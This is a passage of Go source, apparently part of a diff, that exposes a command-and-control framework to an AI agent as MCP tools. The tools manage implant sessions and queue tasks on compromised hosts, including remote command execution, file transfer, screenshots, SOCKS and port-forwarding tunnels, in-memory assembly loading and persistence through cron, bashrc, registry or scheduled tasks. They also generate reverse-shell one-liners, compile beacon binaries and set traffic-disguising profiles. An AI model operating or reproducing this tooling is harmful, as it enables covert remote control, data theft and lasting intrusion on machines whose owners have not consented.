return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
|
||||
|
||||
default:
|
||||
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// c2_session — 会话统一工具
|
||||
// ============================================================================
|
||||
|
||||
func registerC2SessionTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
||||
s.RegisterTool(mcp.Tool{
|
||||
Name: builtin.ToolC2Session,
|
||||
Description: `C2 会话管理。通过 action 参数选择操作:
|
||||
- list: 列出会话(可按 listener_id/status/os/search 过滤)
|
||||
- get: 获取会话详情及最近任务历史(需 session_id)
|
||||
- set_sleep: 设置心跳间隔(需 session_id)
|
||||
- kill: 下发 exit 任务让 implant 退出(需 session_id)
|
||||
- delete: 删除会话记录(需 session_id)`,
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/set_sleep/kill/delete", "enum": []string{"list", "get", "set_sleep", "kill", "delete"}},
|
||||
"session_id": map[string]interface{}{"type": "string", "description": "会话 ID(get/set_sleep/kill/delete 需要)"},
|
||||
"listener_id": map[string]interface{}{"type": "string", "description": "按监听器过滤(list)"},
|
||||
"status": map[string]interface{}{"type": "string", "description": "按状态过滤: active/sleeping/dead/killed(list)"},
|
||||
"os": map[string]interface{}{"type": "string", "description": "按 OS 过滤: linux/windows/darwin(list)"},
|
||||
"search": map[string]interface{}{"type": "string", "description": "模糊搜索 hostname/username/IP(list)"},
|
||||
"limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list)"},
|
||||
"sleep_seconds": map[string]interface{}{"type": "integer", "description": "心跳间隔秒数(set_sleep)"},
|
||||
"jitter_percent": map[string]interface{}{"type": "integer", "description": "抖动百分比 0-100(set_sleep)"},
|
||||
},
|
||||
"required": []string{"action"},
|
||||
},
|
||||
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
action := getString(params, "action")
|
||||
id := getString(params, "session_id")
|
||||
|
||||
switch action {
|
||||
case "list":
|
||||
filter := database.ListC2SessionsFilter{
|
||||
ListenerID: getString(params, "listener_id"),
|
||||
Status: getString(params, "status"),
|
||||
OS: getString(params, "os"),
|
||||
Search: getString(params, "search"),
|
||||
}
|
||||
if limit := int(getFloat64(params, "limit")); limit > 0 {
|
||||
filter.Limit = limit
|
||||
}
|
||||
sessions, err := m.DB().ListC2Sessions(filter)
|
||||
return makeC2Result(map[string]interface{}{"sessions": sessions, "count": len(sessions)}, err)
|
||||
|
||||
case "get":
|
||||
session, err := m.DB().GetC2Session(id)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if session == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("session not found"))
|
||||
}
|
||||
tasks, _ := m.DB().ListC2Tasks(database.ListC2TasksFilter{SessionID: id, Limit: 10})
|
||||
return makeC2Result(map[string]interface{}{"session": session, "tasks": tasks}, nil)
|
||||
|
||||
case "set_sleep":
|
||||
sleep := int(getFloat64(params, "sleep_seconds"))
|
||||
jitter := int(getFloat64(params, "jitter_percent"))
|
||||
err := m.DB().SetC2SessionSleep(id, sleep, jitter)
|
||||
return makeC2Result(map[string]interface{}{"updated": err == nil, "sleep_seconds": sleep, "jitter_percent": jitter}, err)
|
||||
|
||||
case "kill":
|
||||
task, err := m.EnqueueTask(c2.EnqueueTaskInput{
|
||||
SessionID: id,
|
||||
TaskType: c2.TaskTypeExit,
|
||||
Payload: map[string]interface{}{},
|
||||
Source: "ai",
|
||||
ConversationID: agent.ConversationIDFromContext(ctx),
|
||||
UserCtx: ctx,
|
||||
})
|
||||
return makeC2Result(map[string]interface{}{"task": task}, err)
|
||||
|
||||
case "delete":
|
||||
err := m.DB().DeleteC2Session(id)
|
||||
return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
|
||||
|
||||
default:
|
||||
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// c2_task — 任务下发统一工具(合并所有 task 类型)
|
||||
// ============================================================================
|
||||
|
||||
func registerC2TaskTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
||||
s.RegisterTool(mcp.Tool{
|
||||
Name: builtin.ToolC2Task,
|
||||
Description: `在 C2 会话上下发任务。所有任务类型通过 task_type 参数指定:
|
||||
- exec: 执行命令(需 command)
|
||||
- shell: 交互式命令,保持 cwd(需 command)
|
||||
- pwd/ps/screenshot/socks_stop: 无额外参数
|
||||
- cd/ls: 需 path
|
||||
- kill_proc: 需 pid
|
||||
- upload: 需 remote_path + file_id
|
||||
- download: 需 remote_path
|
||||
- port_fwd: 需 action(start/stop) + local_port + remote_host + remote_port
|
||||
- socks_start: 需 port(默认 1080)
|
||||
- load_assembly: 需 data(base64) 或 file_id,可选 args
|
||||
- persist: 可选 method(auto/cron/bashrc/launchagent/registry/schtasks)
|
||||
返回 task_id,用 c2_task_manage 的 wait/get_result 获取结果。`,
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"session_id": map[string]interface{}{"type": "string", "description": "C2 会话 ID(s_xxx)"},
|
||||
"task_type": map[string]interface{}{"type": "string", "description": "任务类型", "enum": []string{"exec", "shell", "pwd", "cd", "ls", "ps", "kill_proc", "upload", "download", "screenshot", "port_fwd", "socks_start", "socks_stop", "load_assembly", "persist"}},
|
||||
"command": map[string]interface{}{"type": "string", "description": "命令(exec/shell)"},
|
||||
"path": map[string]interface{}{"type": "string", "description": "路径(cd/ls)"},
|
||||
"pid": map[string]interface{}{"type": "integer", "description": "进程 ID(kill_proc)"},
|
||||
"remote_path": map[string]interface{}{"type": "string", "description": "远程路径(upload/download)"},
|
||||
"file_id": map[string]interface{}{"type": "string", "description": "服务端文件 ID(upload/load_assembly)"},
|
||||
"data": map[string]interface{}{"type": "string", "description": "base64 数据(load_assembly)"},
|
||||
"args": map[string]interface{}{"type": "string", "description": "命令行参数(load_assembly)"},
|
||||
"action": map[string]interface{}{"type": "string", "description": "start/stop(port_fwd)"},
|
||||
"local_port": map[string]interface{}{"type": "integer", "description": "本地端口(port_fwd)"},
|
||||
"remote_host": map[string]interface{}{"type": "string", "description": "远程主机(port_fwd)"},
|
||||
"remote_port": map[string]interface{}{"type": "integer", "description": "远程端口(port_fwd)"},
|
||||
"port": map[string]interface{}{"type": "integer", "description": "SOCKS5 端口(socks_start),默认 1080"},
|
||||
"method": map[string]interface{}{"type": "string", "description": "持久化方法(persist): auto/cron/bashrc/launchagent/registry/schtasks"},
|
||||
"timeout_seconds": map[string]interface{}{"type": "integer", "description": "超时秒数,默认 60"},
|
||||
},
|
||||
"required": []string{"session_id", "task_type"},
|
||||
},
|
||||
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
sessionID := getString(params, "session_id")
|
||||
taskTypeStr := getString(params, "task_type")
|
||||
taskType := c2.TaskType(taskTypeStr)
|
||||
timeout := getFloat64(params, "timeout_seconds")
|
||||
|
||||
payload := map[string]interface{}{"timeout_seconds": timeout}
|
||||
|
||||
switch taskType {
|
||||
case c2.TaskTypeExec, c2.TaskTypeShell:
|
||||
payload["command"] = getString(params, "command")
|
||||
case c2.TaskTypeCd, c2.TaskTypeLs:
|
||||
payload["path"] = getString(params, "path")
|
||||
case c2.TaskTypeKillProc:
|
||||
payload["pid"] = params["pid"]
|
||||
case c2.TaskTypeUpload:
|
||||
payload["remote_path"] = getString(params, "remote_path")
|
||||
payload["file_id"] = getString(params, "file_id")
|
||||
case c2.TaskTypeDownload:
|
||||
payload["remote_path"] = getString(params, "remote_path")
|
||||
case c2.TaskTypePortFwd:
|
||||
payload["action"] = getString(params, "action")
|
||||
payload["local_port"] = params["local_port"]
|
||||
payload["remote_host"] = getString(params, "remote_host")
|
||||
payload["remote_port"] = params["remote_port"]
|
||||
case c2.TaskTypeSocksStart:
|
||||
payload["port"] = params["port"]
|
||||
case c2.TaskTypeLoadAssembly:
|
||||
payload["data"] = getString(params, "data")
|
||||
payload["file_id"] = getString(params, "file_id")
|
||||
payload["args"] = getString(params, "args")
|
||||
case c2.TaskTypePersist:
|
||||
payload["method"] = getString(params, "method")
|
||||
case c2.TaskTypePwd, c2.TaskTypePs, c2.TaskTypeScreenshot, c2.TaskTypeSocksStop:
|
||||
// no extra params
|
||||
default:
|
||||
return makeC2Result(nil, fmt.Errorf("unsupported task_type: %s", taskTypeStr))
|
||||
}
|
||||
|
||||
input := c2.EnqueueTaskInput{
|
||||
SessionID: sessionID,
|
||||
TaskType: taskType,
|
||||
Payload: payload,
|
||||
Source: "ai",
|
||||
ConversationID: agent.ConversationIDFromContext(ctx),
|
||||
UserCtx: ctx,
|
||||
}
|
||||
task, err := m.EnqueueTask(input)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
return makeC2Result(map[string]interface{}{"task_id": task.ID, "status": task.Status}, nil)
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// c2_task_manage — 任务管理工具(查询/等待/取消)
|
||||
// ============================================================================
|
||||
|
||||
func registerC2TaskManageTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
||||
s.RegisterTool(mcp.Tool{
|
||||
Name: builtin.ToolC2TaskManage,
|
||||
Description: `C2 任务管理。通过 action 参数选择操作:
|
||||
- get_result: 获取任务详情和结果(需 task_id)
|
||||
- wait: 阻塞等待任务完成并返回结果(需 task_id)
|
||||
- list: 列出任务(可按 session_id/status 过滤)
|
||||
- cancel: 取消排队中的任务(需 task_id)`,
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"action": map[string]interface{}{"type": "string", "description": "操作: get_result/wait/list/cancel", "enum": []string{"get_result", "wait", "list", "cancel"}},
|
||||
"task_id": map[string]interface{}{"type": "string", "description": "任务 ID(get_result/wait/cancel 需要)"},
|
||||
"session_id": map[string]interface{}{"type": "string", "description": "按会话过滤(list)"},
|
||||
"status": map[string]interface{}{"type": "string", "description": "按状态过滤: queued/sent/running/success/failed/cancelled(list)"},
|
||||
"limit": map[string]interface{}{"type": "integer", "description": "返回数量上限(list)"},
|
||||
"timeout_seconds": map[string]interface{}{"type": "integer", "description": "等待超时秒数(wait),默认 60"},
|
||||
},
|
||||
"required": []string{"action"},
|
||||
},
|
||||
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
action := getString(params, "action")
|
||||
|
||||
switch action {
|
||||
case "get_result":
|
||||
id := getString(params, "task_id")
|
||||
task, err := m.DB().GetC2Task(id)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if task == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("task not found"))
|
||||
}
|
||||
return makeC2Result(map[string]interface{}{"task": task}, nil)
|
||||
|
||||
case "wait":
|
||||
id := getString(params, "task_id")
|
||||
timeout := int(getFloat64(params, "timeout_seconds"))
|
||||
if timeout <= 0 {
|
||||
timeout = 60
|
||||
}
|
||||
deadline := time.Now().Add(time.Duration(timeout) * time.Second)
|
||||
for time.Now().Before(deadline) {
|
||||
task, err := m.DB().GetC2Task(id)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if task == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("task not found"))
|
||||
}
|
||||
if task.Status == "success" || task.Status == "failed" || task.Status == "cancelled" {
|
||||
return makeC2Result(map[string]interface{}{"task": task}, nil)
|
||||
}
|
||||
select {
|
||||
case <-time.After(500 * time.Millisecond):
|
||||
case <-ctx.Done():
|
||||
return makeC2Result(nil, ctx.Err())
|
||||
}
|
||||
}
|
||||
return makeC2Result(nil, fmt.Errorf("timeout waiting for task completion"))
|
||||
|
||||
case "list":
|
||||
filter := database.ListC2TasksFilter{
|
||||
SessionID: getString(params, "session_id"),
|
||||
Status: getString(params, "status"),
|
||||
}
|
||||
if limit := int(getFloat64(params, "limit")); limit > 0 {
|
||||
filter.Limit = limit
|
||||
}
|
||||
tasks, err := m.DB().ListC2Tasks(filter)
|
||||
return makeC2Result(map[string]interface{}{"tasks": tasks, "count": len(tasks)}, err)
|
||||
|
||||
case "cancel":
|
||||
id := getString(params, "task_id")
|
||||
err := m.CancelTask(id)
|
||||
return makeC2Result(map[string]interface{}{"cancelled": err == nil}, err)
|
||||
|
||||
default:
|
||||
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// c2_payload — Payload 统一工具
|
||||
// ============================================================================
|
||||
|
||||
func registerC2PayloadTool(s *mcp.Server, m *c2.Manager, l *zap.Logger, webListenPort int) {
|
||||
s.RegisterTool(mcp.Tool{
|
||||
Name: builtin.ToolC2Payload,
|
||||
Description: fmt.Sprintf(`C2 Payload 生成。通过 action 参数选择操作:
|
||||
- oneliner: 生成单行 payload。kind 必须与监听器协议一致,否则会失败:
|
||||
• tcp_reverse:裸 TCP 反弹,可用 kind: bash, nc, nc_mkfifo, python, perl, powershell(bash 指 /dev/tcp 类,不是 HTTP)。
|
||||
• http_beacon / https_beacon / websocket:仅 HTTP(S) Beacon 轮询,oneliner 只能用 kind: curl_beacon(脚本内用 bash+curl,与「tcp 的 bash」不同)。curl_beacon 返回串末尾含「 &」用于把整个 bash -c 放后台;若用 exec/execute 同步执行,必须整段原样复制(含末尾 &)。若删掉 &,内部 while 死循环占满前台,调用会一直阻塞到超时/杀进程。
|
||||
• 需要经典 bash 反弹 shell 时:先 c2_listener create type=tcp_reverse,再对该监听器用 kind=bash。
|
||||
• 省略 kind 时,会按监听器类型自动选第一个兼容类型(HTTP 系默认为 curl_beacon)。
|
||||
- build: 交叉编译 beacon 二进制。支持 http_beacon / https_beacon / websocket / tcp_reverse(tcp_reverse 下植入端回连后先发魔数 CSB1,再走与 HTTP 相同的 AES-GCM JSON 语义;未发魔数的连接仍按经典交互 shell 处理)。
|
||||
依赖的监听器 bind_port 须避开本服务 Web 端口 %d(配置 server.port,与 c2_listener 描述一致),否则 Beacon 无法正确回连。`, webListenPort),
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"action": map[string]interface{}{"type": "string", "description": "操作: oneliner/build", "enum": []string{"oneliner", "build"}},
|
||||
"listener_id": map[string]interface{}{"type": "string", "description": "监听器 ID(必填)。oneliner 前请确认该监听器的 type,再选兼容的 kind"},
|
||||
"kind": map[string]interface{}{"type": "string", "description": "仅 action=oneliner 需要。tcp_reverse: bash|nc|nc_mkfifo|python|perl|powershell;http_beacon|https_beacon|websocket: 仅 curl_beacon"},
|
||||
"host": map[string]interface{}{"type": "string", "description": "oneliner/build 可选覆盖:非空则强制用作植入回连主机。留空时顺序为:监听器 callback_host(create/update 的 callback_host 参数写入)→ bind_host(0.0.0.0 时尝试本机对外 IP 探测)"},
|
||||
"os": map[string]interface{}{"type": "string", "description": "目标 OS(build): linux/windows/darwin", "default": "linux"},
|
||||
"arch": map[string]interface{}{"type": "string", "description": "目标架构(build): amd64/arm64/386/arm", "default": "amd64"},
|
||||
"sleep_seconds": map[string]interface{}{"type": "integer", "description": "默认心跳间隔(build)"},
|
||||
"jitter_percent": map[string]interface{}{"type": "integer", "description": "默认抖动百分比(build)"},
|
||||
},
|
||||
"required": []string{"action", "listener_id"},
|
||||
},
|
||||
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
action := getString(params, "action")
|
||||
listenerID := getString(params, "listener_id")
|
||||
|
||||
switch action {
|
||||
case "oneliner":
|
||||
listener, err := m.DB().GetC2Listener(listenerID)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if listener == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("listener not found"))
|
||||
}
|
||||
host := c2.ResolveBeaconDialHost(listener, getString(params, "host"), l, listenerID)
|
||||
kind := c2.OnelinerKind(getString(params, "kind"))
|
||||
if kind == "" {
|
||||
compatible := c2.OnelinerKindsForListener(listener.Type)
|
||||
if len(compatible) > 0 {
|
||||
kind = compatible[0]
|
||||
}
|
||||
}
|
||||
if !c2.IsOnelinerCompatible(listener.Type, kind) {
|
||||
compatible := c2.OnelinerKindsForListener(listener.Type)
|
||||
names := make([]string, len(compatible))
|
||||
for i, k := range compatible {
|
||||
names[i] = string(k)
|
||||
}
|
||||
return makeC2Result(nil, fmt.Errorf("监听器类型 %s 不支持 %s,兼容类型: %v", listener.Type, kind, names))
|
||||
}
|
||||
input := c2.OnelinerInput{
|
||||
Kind: kind,
|
||||
Host: host,
|
||||
Port: listener.BindPort,
|
||||
HTTPBaseURL: fmt.Sprintf("http://%s:%d", host, listener.BindPort),
|
||||
ImplantToken: listener.ImplantToken,
|
||||
}
|
||||
oneliner, err := c2.GenerateOneliner(input)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
out := map[string]interface{}{
|
||||
"oneliner": oneliner, "kind": input.Kind, "host": host, "port": listener.BindPort,
|
||||
}
|
||||
if kind == c2.OnelinerCurl {
|
||||
out["usage_note"] = "同步 exec/execute:整段原样执行(末尾须有「 &」)。去掉则 while 永不结束,工具会一直卡住。"
|
||||
}
|
||||
return makeC2Result(out, nil)
|
||||
|
||||
case "build":
|
||||
builder := c2.NewPayloadBuilder(m, l, "", "")
|
||||
input := c2.PayloadBuilderInput{
|
||||
ListenerID: listenerID,
|
||||
OS: getString(params, "os"),
|
||||
Arch: getString(params, "arch"),
|
||||
SleepSeconds: int(getFloat64(params, "sleep_seconds")),
|
||||
JitterPercent: int(getFloat64(params, "jitter_percent")),
|
||||
Host: strings.TrimSpace(getString(params, "host")),
|
||||
}
|
||||
result, err := builder.BuildBeacon(input)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
return makeC2Result(map[string]interface{}{
|
||||
"payload_id": result.PayloadID, "download_path": result.DownloadPath,
|
||||
"os": result.OS, "arch": result.Arch, "size_bytes": result.SizeBytes,
|
||||
}, nil)
|
||||
|
||||
default:
|
||||
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// c2_event — 事件查询工具
|
||||
// ============================================================================
|
||||
|
||||
func registerC2EventTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
||||
s.RegisterTool(mcp.Tool{
|
||||
Name: builtin.ToolC2Event,
|
||||
Description: "获取 C2 事件(上线/掉线/任务/错误),支持按级别/类别/会话/任务/时间过滤",
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"level": map[string]interface{}{"type": "string", "description": "级别过滤: info/warn/critical"},
|
||||
"category": map[string]interface{}{"type": "string", "description": "类别过滤: listener/session/task/payload/opsec"},
|
||||
"session_id": map[string]interface{}{"type": "string", "description": "按会话过滤"},
|
||||
"task_id": map[string]interface{}{"type": "string", "description": "按任务过滤"},
|
||||
"since": map[string]interface{}{"type": "string", "description": "起始时间(RFC3339 格式,如 2025-01-01T00:00:00Z)"},
|
||||
"limit": map[string]interface{}{"type": "integer", "default": 50, "description": "返回数量"},
|
||||
},
|
||||
},
|
||||
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
filter := database.ListC2EventsFilter{
|
||||
Level: getString(params, "level"),
|
||||
Category: getString(params, "category"),
|
||||
SessionID: getString(params, "session_id"),
|
||||
TaskID: getString(params, "task_id"),
|
||||
Limit: int(getFloat64(params, "limit")),
|
||||
}
|
||||
if filter.Limit <= 0 {
|
||||
filter.Limit = 50
|
||||
}
|
||||
if since := getString(params, "since"); since != "" {
|
||||
if t, err := time.Parse(time.RFC3339, since); err == nil {
|
||||
filter.Since = &t
|
||||
}
|
||||
}
|
||||
events, err := m.DB().ListC2Events(filter)
|
||||
return makeC2Result(map[string]interface{}{"events": events, "count": len(events)}, err)
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// c2_profile — Malleable Profile 管理工具(新增)
|
||||
// ============================================================================
|
||||
|
||||
func registerC2ProfileTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
||||
s.RegisterTool(mcp.Tool{
|
||||
Name: builtin.ToolC2Profile,
|
||||
Description: `C2 Malleable Profile 管理(控制 beacon 通信伪装)。通过 action 参数选择操作:
|
||||
- list: 列出所有 Profile
|
||||
- get: 获取 Profile 详情(需 profile_id)
|
||||
- create: 创建 Profile(需 name,可选 user_agent/uris/request_headers/response_headers/body_template/jitter_min_ms/jitter_max_ms)
|
||||
- update: 更新 Profile(需 profile_id)
|
||||
- delete: 删除 Profile(需 profile_id)`,
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"action": map[string]interface{}{"type": "string", "description": "操作: list/get/create/update/delete", "enum": []string{"list", "get", "create", "update", "delete"}},
|
||||
"profile_id": map[string]interface{}{"type": "string", "description": "Profile ID(get/update/delete 需要)"},
|
||||
"name": map[string]interface{}{"type": "string", "description": "Profile 名称"},
|
||||
"user_agent": map[string]interface{}{"type": "string", "description": "User-Agent 字符串"},
|
||||
"uris": map[string]interface{}{"type": "array", "items": map[string]interface{}{"type": "string"}, "description": "beacon 请求的 URI 列表"},
|
||||
"request_headers": map[string]interface{}{"type": "object", "description": "自定义请求头"},
|
||||
"response_headers": map[string]interface{}{"type": "object", "description": "自定义响应头"},
|
||||
"body_template": map[string]interface{}{"type": "string", "description": "响应体模板"},
|
||||
"jitter_min_ms": map[string]interface{}{"type": "integer", "description": "最小抖动(毫秒)"},
|
||||
"jitter_max_ms": map[string]interface{}{"type": "integer", "description": "最大抖动(毫秒)"},
|
||||
},
|
||||
"required": []string{"action"},
|
||||
},
|
||||
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
action := getString(params, "action")
|
||||
id := getString(params, "profile_id")
|
||||
|
||||
switch action {
|
||||
case "list":
|
||||
profiles, err := m.DB().ListC2Profiles()
|
||||
return makeC2Result(map[string]interface{}{"profiles": profiles, "count": len(profiles)}, err)
|
||||
|
||||
case "get":
|
||||
profile, err := m.DB().GetC2Profile(id)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if profile == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("profile not found"))
|
||||
}
|
||||
return makeC2Result(map[string]interface{}{"profile": profile}, nil)
|
||||
|
||||
case "create":
|
||||
profile := &database.C2Profile{
|
||||
ID: "p_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14],
|
||||
Name: getString(params, "name"),
|
||||
UserAgent: getString(params, "user_agent"),
|
||||
BodyTemplate: getString(params, "body_template"),
|
||||
JitterMinMS: int(getFloat64(params, "jitter_min_ms")),
|
||||
JitterMaxMS: int(getFloat64(params, "jitter_max_ms")),
|
||||
CreatedAt: time.Now(),
|
||||
}
|
||||
if uris, ok := params["uris"]; ok {
|
||||
if arr, ok := uris.([]interface{}); ok {
|
||||
for _, u := range arr {
|
||||
if s, ok := u.(string); ok {
|
||||
profile.URIs = append(profile.URIs, s)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if rh, ok := params["request_headers"]; ok {
|
||||
if m, ok := rh.(map[string]interface{}); ok {
|
||||
profile.RequestHeaders = make(map[string]string)
|
||||
for k, v := range m {
|
||||
profile.RequestHeaders[k], _ = v.(string)
|
||||
}
|
||||
}
|
||||
}
|
||||
if rh, ok := params["response_headers"]; ok {
|
||||
if m, ok := rh.(map[string]interface{}); ok {
|
||||
profile.ResponseHeaders = make(map[string]string)
|
||||
for k, v := range m {
|
||||
profile.ResponseHeaders[k], _ = v.(string)
|
||||
}
|
||||
}
|
||||
}
|
||||
if err := m.DB().CreateC2Profile(profile); err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
return makeC2Result(map[string]interface{}{"profile": profile}, nil)
|
||||
|
||||
case "update":
|
||||
profile, err := m.DB().GetC2Profile(id)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if profile == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("profile not found"))
|
||||
}
|
||||
if v := getString(params, "name"); v != "" {
|
||||
profile.Name = v
|
||||
}
|
||||
if v := getString(params, "user_agent"); v != "" {
|
||||
profile.UserAgent = v
|
||||
}
|
||||
if v := getString(params, "body_template"); v != "" {
|
||||
profile.BodyTemplate = v
|
||||
}
|
||||
if v := int(getFloat64(params, "jitter_min_ms")); v > 0 {
|
||||
profile.JitterMinMS = v
|
||||
}
|
||||
if v := int(getFloat64(params, "jitter_max_ms")); v > 0 {
|
||||
profile.JitterMaxMS = v
|
||||
}
|
||||
if uris, ok := params["uris"]; ok {
|
||||
if arr, ok := uris.([]interface{}); ok {
|
||||
profile.URIs = nil
|
||||
for _, u := range arr {
|
||||
if s, ok := u.(string); ok {
|
||||
profile.URIs = append(profile.URIs, s)
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
if rh, ok := params["request_headers"]; ok {
|
||||
if mp, ok := rh.(map[string]interface{}); ok {
|
||||
profile.RequestHeaders = make(map[string]string)
|
||||
for k, v := range mp {
|
||||
profile.RequestHeaders[k], _ = v.(string)
|
||||
}
|
||||
}
|
||||
}
|
||||
if rh, ok := params["response_headers"]; ok {
|
||||
if mp, ok := rh.(map[string]interface{}); ok {
|
||||
profile.ResponseHeaders = make(map[string]string)
|
||||
for k, v := range mp {
|
||||
profile.ResponseHeaders[k], _ = v.(string)
|
||||
}
|
||||
}
|
||||
}
|
||||
if err := m.DB().UpdateC2Profile(profile); err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
return makeC2Result(map[string]interface{}{"profile": profile}, nil)
|
||||
|
||||
case "delete":
|
||||
err := m.DB().DeleteC2Profile(id)
|
||||
return makeC2Result(map[string]interface{}{"deleted": err == nil}, err)
|
||||
|
||||
default:
|
||||
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// c2_file — 文件管理工具(新增)
|
||||
// ============================================================================
|
||||
|
||||
func registerC2FileTool(s *mcp.Server, m *c2.Manager, l *zap.Logger) {
|
||||
s.RegisterTool(mcp.Tool{
|
||||
Name: builtin.ToolC2File,
|
||||
Description: `C2 文件管理。通过 action 参数选择操作:
|
||||
- list: 列出会话的文件传输记录(需 session_id)
|
||||
- get_result: 获取任务结果文件路径(截图等,需 task_id)`,
|
||||
InputSchema: map[string]interface{}{
|
||||
"type": "object",
|
||||
"properties": map[string]interface{}{
|
||||
"action": map[string]interface{}{"type": "string", "description": "操作: list/get_result", "enum": []string{"list", "get_result"}},
|
||||
"session_id": map[string]interface{}{"type": "string", "description": "会话 ID(list 需要)"},
|
||||
"task_id": map[string]interface{}{"type": "string", "description": "任务 ID(get_result 需要)"},
|
||||
},
|
||||
"required": []string{"action"},
|
||||
},
|
||||
}, func(ctx context.Context, params map[string]interface{}) (*mcp.ToolResult, error) {
|
||||
action := getString(params, "action")
|
||||
|
||||
switch action {
|
||||
case "list":
|
||||
sessionID := getString(params, "session_id")
|
||||
if sessionID == "" {
|
||||
return makeC2Result(nil, fmt.Errorf("session_id required"))
|
||||
}
|
||||
files, err := m.DB().ListC2FilesBySession(sessionID)
|
||||
return makeC2Result(map[string]interface{}{"files": files, "count": len(files)}, err)
|
||||
|
||||
case "get_result":
|
||||
taskID := getString(params, "task_id")
|
||||
task, err := m.DB().GetC2Task(taskID)
|
||||
if err != nil {
|
||||
return makeC2Result(nil, err)
|
||||
}
|
||||
if task == nil {
|
||||
return makeC2Result(nil, fmt.Errorf("task not found"))
|
||||
}
|
||||
if task.ResultBlobPath == "" {
|
||||
return makeC2Result(map[string]interface{}{"has_file": false, "task_id": taskID}, nil)
|
||||
}
|
||||
return makeC2Result(map[string]interface{}{
|
||||
"has_file": true,
|
||||
"task_id": taskID,
|
||||
"file_path": task.ResultBlobPath,
|
||||
}, nil)
|
||||
|
||||
default:
|
||||
return makeC2Result(nil, fmt.Errorf("unknown action: %s", action))
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
// ============================================================================
|
||||
// 工具函数
|
||||
// ============================================================================
|
||||
|
||||
func getString(params map[string]interface{}, key string) string {
|
||||
if v, ok := params[key]; ok {
|
||||
if s, ok := v.(string); ok {
|
||||
return s
|
||||
}
|
||||
}
|
||||
return ""
|
||||
}
|
||||
|
||||
func getFloat64(params map[string]interface{}, key string) float64 {
|
||||
if v, ok := params[key]; ok {
|
||||
switch n := v.(type) {
|
||||
case float64:
|
||||
return n
|
||||
case int:
|
||||
return float64(n)
|
||||
case string:
|
||||
if f, err := strconv.ParseFloat(n, 64); err == nil {
|
||||
return f
|
||||
}
|
||||
}
|
||||
}
|
||||
return 0
|
||||
}
|
||||
@@ -301,7 +301,7 @@ func (b *Builder) formatProcessDetailsForAttackChain(details []database.ProcessD
|
||||
// 目标:以主 agent(编排器)视角输出整轮迭代
|
||||
// - 保留:编排器工具调用/结果、对子代理的 task 调度、子代理最终回复(不含推理)
|
||||
// - 丢弃:thinking/planning/progress 等噪声、子代理的工具细节与推理过程
|
||||
if d.EventType == "progress" || d.EventType == "thinking" || d.EventType == "planning" {
|
||||
if d.EventType == "progress" || d.EventType == "thinking" || d.EventType == "reasoning_chain" || d.EventType == "planning" {
|
||||
continue
|
||||
}
|
||||
|
||||
